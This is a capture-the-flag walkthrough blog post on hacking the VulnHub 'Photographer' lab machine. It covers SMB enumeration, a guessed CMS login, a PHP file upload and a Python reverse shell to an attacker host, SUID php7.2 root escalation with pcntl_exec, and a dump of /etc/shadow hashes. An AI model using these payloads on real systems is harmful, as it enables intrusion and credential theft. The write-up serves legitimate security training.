VulnHub Photographer Walkthrough – PHP FTW!

My first streamed vulnerable machine was VulnHub Photographer, and I’ve finally finished the write-up!

VulnHub Photographer Walkthrough – Introduction

I haven’t solved a VulnHub box since Casino Royale, so it was nice to get back into the swing of things.

This was a fairly simple box, but the PHP execution at the end definitely gave me some trouble.

You can find the VM here, and I’d say it is easy to intermediate difficulty.

YouTube Version of this Post

If you prefer video and audio over just reading the text, then you can find the YouTube version of this post below.

That said, don’t forget to hit those like and subscribe buttons to help support the blog and channel!

Enumeration

First, I ran a ping sweep to see where the box was on my network.

root@kali:~/photographer# nmap -sn 192.168.5.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-13 19:30 EDT
Nmap scan report for pfSense.sanctuary (192.168.5.1)
Host is up (0.00020s latency).
MAC Address: 00:01:xx:xx:xx:xx (PC Partner)
Nmap scan report for 192.168.5.100

...

Host is up (0.0035s latency).
MAC Address: 38:F9:D3:CE:3F:89 (Unknown)
Nmap scan report for 192.168.5.131

Next, I ran a quick port scan, and discovered that ports 80, 139, 445, and 8000 were open on the target.

root@kali:~/photographer# nmap -A 192.168.5.131
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-13 19:33 EDT
Nmap scan report for 192.168.5.131
Host is up (0.00074s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Koken 0.22.24
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
MAC Address: 08:00:27:C4:FF:DD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: PHOTOGRAPHER

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: photographer
|   NetBIOS computer name: PHOTOGRAPHER\x00
|   Domain name: \x00
|   FQDN: photographer
|_  System time: 2020-08-13T19:33:24-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-08-13 19:33:24
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.74 ms 192.168.5.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.38 seconds

Finally, I ran enum4linux against the target (although I accidentally forgot to save the command output).

Initial Foothold

First, I used smbclient to connect to the open share that I discovered with enum4linux. As you can see, there were two files that I had unauthenticated access to, so I grabbed them.

root@kali:~/photographer# smbclient \\\\192.168.5.131\\sambashare
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jul 20 21:30:07 2020
  ..                                  D        0  Tue Jul 21 05:44:25 2020
  mailsent.txt                        N      503  Mon Jul 20 21:29:40 2020
  wordpress.bkp.zip                   N 13930308  Mon Jul 20 21:22:23 2020

        278627392 blocks of size 1024. 264268400 blocks available
smb: \> get mailsent.txt
getting file \mailsent.txt of size 503 as mailsent.txt (23.4 KiloBytes/sec) (average 23.4 KiloBytes/sec)
smb: \> get wordpress.bkp.zip
getting file \wordpress.bkp.zip of size 13930308 as wordpress.bkp.zip (38213.0 KiloBytes/sec) (average 36085.7 KiloBytes/sec)
smb: \> exit

While the WordPress backup didn’t have anything too interesting, the mailsent.txt file contained either a hint or a password.

root@kali:~/photographer# cat mailsent.txt
Message-ID: <[email protected]>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi 
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl 😉

When I looked at port 80, I found a basic website without anything terribly interesting.

That said, port 8000 had a CMS that was running some sort of blog and photo album.

With a bit of google searching, I discovered the default Koken administrator login.

Using the e-mail address from the discovered mailsent file ([email protected]) along with the possible password (babygirl), I was able to login to the Koken administrative panel!

Looking around the panel, I found a place to upload images, along with a likely arbitrary file upload vulnerability.

After uploading my malicious PHP image, I used the pentestmonkey reverse shell cheat sheet and created a Python reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.5.132",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

When I visited my uploaded PHP shell, along with the embeded command, I received my reverse shell!

http://192.168.5.131:8000/storage/originals/3a/ad/image.php?cmd=%70%79%74%68%6f%6e%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%35%2e%31%33%32%22%2c%34%34%34%34%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%22%2f%62%69%6e%2f%73%68%22%2c%22%2d%69%22%5d%29%3b%27

root@kali:~/photographer# nc -lvp 4444
listening on [any] 4444 ...
192.168.5.131: inverse host lookup failed: Unknown host
connect to [192.168.5.132] from (UNKNOWN) [192.168.5.131] 54132
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation

First, I grabbed the user flag from the daisa home directory, for my “proof” of exploitation.

www-data@photographer:/home$ cat daisa/user.txt
cat daisa/user.txt
d41d8cd98f00b204e9800998ecf8427e

Next, after searching the filesystem for SUID binaries, I found that PHP was SUID root.

www-data@photographer:/home$ ls -al /usr/bin/php7.2
ls -al /usr/bin/php7.2
-rwsr-xr-x 1 root root 4883680 Jul  9 13:40 /usr/bin/php7.2

While I was able to execute inline PHP commands, it took me a lot of trial and error to use this for escalation (as you can see from the excerpt below).

www/html/koken/storage/originals/3a/ad$ php -r 'system("/bin/sh")'
www-data@photographer:/var/www$ php -r 'system("/bin/sh")'
php -r 'system("/bin/sh")'
PHP Parse error:  syntax error, unexpected end of file in Command line code on line 1
www-data@photographer:/var/www$ php -r 'system("/bin/sh");'
php -r 'system("/bin/sh");'
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
exit
www-data@photographer:/var/www$ php -r 'system("/bin/sh -p");'
php -r 'system("/bin/sh -p");'
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
exit
www-data@photographer:/var/www$ php -r 'exec("/bin/sh -p");'
php -r 'exec("/bin/sh -p");'
id
id
exit
exit
www-data@photographer:/var/www$ which php
which php
/usr/bin/php
www-data@photographer:/var/www$ ls -al /usr/bin/php
ls -al /usr/bin/php
lrwxrwxrwx 1 root root 21 Jul 20 19:35 /usr/bin/php -> /etc/alternatives/php
www-data@photographer:/var/www$ /usr/bin/php7.2 -r 'exec("/bin/sh -p");'
/usr/bin/php7.2 -r 'exec("/bin/sh -p");'
id
id
exit
exit
www-data@photographer:/var/www$ /usr/bin/php7.2 -r 'system("/bin/sh -p");'
/usr/bin/php7.2 -r 'system("/bin/sh -p");'
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
exit
www-data@photographer:/var/www$ ls -al /usr/bin/php7.2
ls -al /usr/bin/php7.2
-rwsr-xr-x 1 root root 4883680 Jul  9 13:40 /usr/bin/php7.2
www-data@photographer:/var/www$ /usr/bin/php7.2 -r 'passthru("/bin/sh -p");'
/usr/bin/php7.2 -r 'passthru("/bin/sh -p");'
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
exit

That said, in the end, a StackOverflow post helped me to use pcntl_exec for execution.

www-data@photographer:/var/www$ php -r 'pcntl_exec("/bin/sh", ["-p"]);'
php -r 'pcntl_exec("/bin/sh", ["-p"]);'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

With my root privileges, I was able to grab the proof.txt file and complete the box!

# cat proof.txt
cat proof.txt
                                                                   
                                .:/://::::///:-`                                
                            -/++:+`:--:o:  oo.-/+/:`                            
                         -++-.`o++s-y:/s: `sh:hy`:-/+:`                         
                       :o:``oyo/o`. `      ```/-so:+--+/`                       
                     -o:-`yh//.                 `./ys/-.o/                      
                    ++.-ys/:/y-                  /s-:/+/:/o`                    
                   o/ :yo-:hNN                   .MNs./+o--s`                   
                  ++ soh-/mMMN--.`            `.-/MMMd-o:+ -s                   
                 .y  /++:NMMMy-.``            ``-:hMMMmoss: +/                  
                 s-     hMMMN` shyo+:.    -/+syd+ :MMMMo     h                  
                 h     `MMMMMy./MMMMMd:  +mMMMMN--dMMMMd     s.                 
                 y     `MMMMMMd`/hdh+..+/.-ohdy--mMMMMMm     +-                 
                 h      dMMMMd:````  `mmNh   ```./NMMMMs     o.                 
                 y.     /MMMMNmmmmd/ `s-:o  sdmmmmMMMMN.     h`                 
                 😮      sMMMMMMMMs.        -hMMMMMMMM/     😮                  
                  s:     `sMMMMMMMo - . `. . hMMMMMMN+     `y`                  
                  `s-      +mMMMMMNhd+h/+h+dhMMMMMMd:     `s-                   
                   `s:    --.sNMMMMMMMMMMMMMMMMMMmo/.    -s.                    
                     /o.`ohd:`.odNMMMMMMMMMMMMNh+.:os/ `/o`                     
                      .++-`+y+/:`/ssdmmNNmNds+-/o-hh:-/o-                       
                        ./+:`:yh:dso/.+-++++ss+h++.:++-                         
                           -/+/-:-/y+/d:yh-o:+--/+/:`                           
                              `-///////////////:`                               
                                                                                

Follow me at: http://v1n1v131r4.com


d41d8cd98f00b204e9800998ecf8427e

And, as usual, I grabbed the shadow file in case anyone wants to check these passwords one day.

cat /etc/shadow
root:$6$W89kMm7z$g5EDOgkjt/COwdYSXsgcKl2sWE1MIAqf6Gk0fnB6fv8OQCWk9VpwuZNkC17X0mbyc97UcAttT4ma1XI9Vknz91:18463:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:17954:0:99999:7:::
uuidd:*:17954:0:99999:7:::
lightdm:*:17954:0:99999:7:::
whoopsie:*:17954:0:99999:7:::
avahi-autoipd:*:17954:0:99999:7:::
avahi:*:17954:0:99999:7:::
dnsmasq:*:17954:0:99999:7:::
colord:*:17954:0:99999:7:::
speech-dispatcher:!:17954:0:99999:7:::
hplip:*:17954:0:99999:7:::
kernoops:*:17954:0:99999:7:::
pulse:*:17954:0:99999:7:::
rtkit:*:17954:0:99999:7:::
saned:*:17954:0:99999:7:::
usbmux:*:17954:0:99999:7:::
agi:$6$6.N5TR1M$41gUgxyG3m9njeVdW9vW6hgi/YwwgFJXEXwTNaH1DDVXgCX0AAayr7np2IWUYDvJ3gnSbsUHeplBfTUVRetXs0:18463:0:99999:7:::
daisa:$6$mxTjNcEI$YhSL7MEyC1zUQa8Xo0CaZBeOSE2PmEHrk1Zf9M20.7Lu1s/IvXkkryme7st2ju73DpzQGCtv8owDUC4KmX47R.:18463:0:99999:7:::
mysql:!:18463:0:99999:7:::

VulnHub Photographer Walkthrough – Conclusion

This was a fun box, and a great start to my hacking streams.

I’ve done this for about 4 weeks so far, and completed over 10 boxes!

Be sure to follow the stream and watch every Thursday, but let me know if there is anything else that you want to see.

To catch me live, be sure to follow me on Twitch!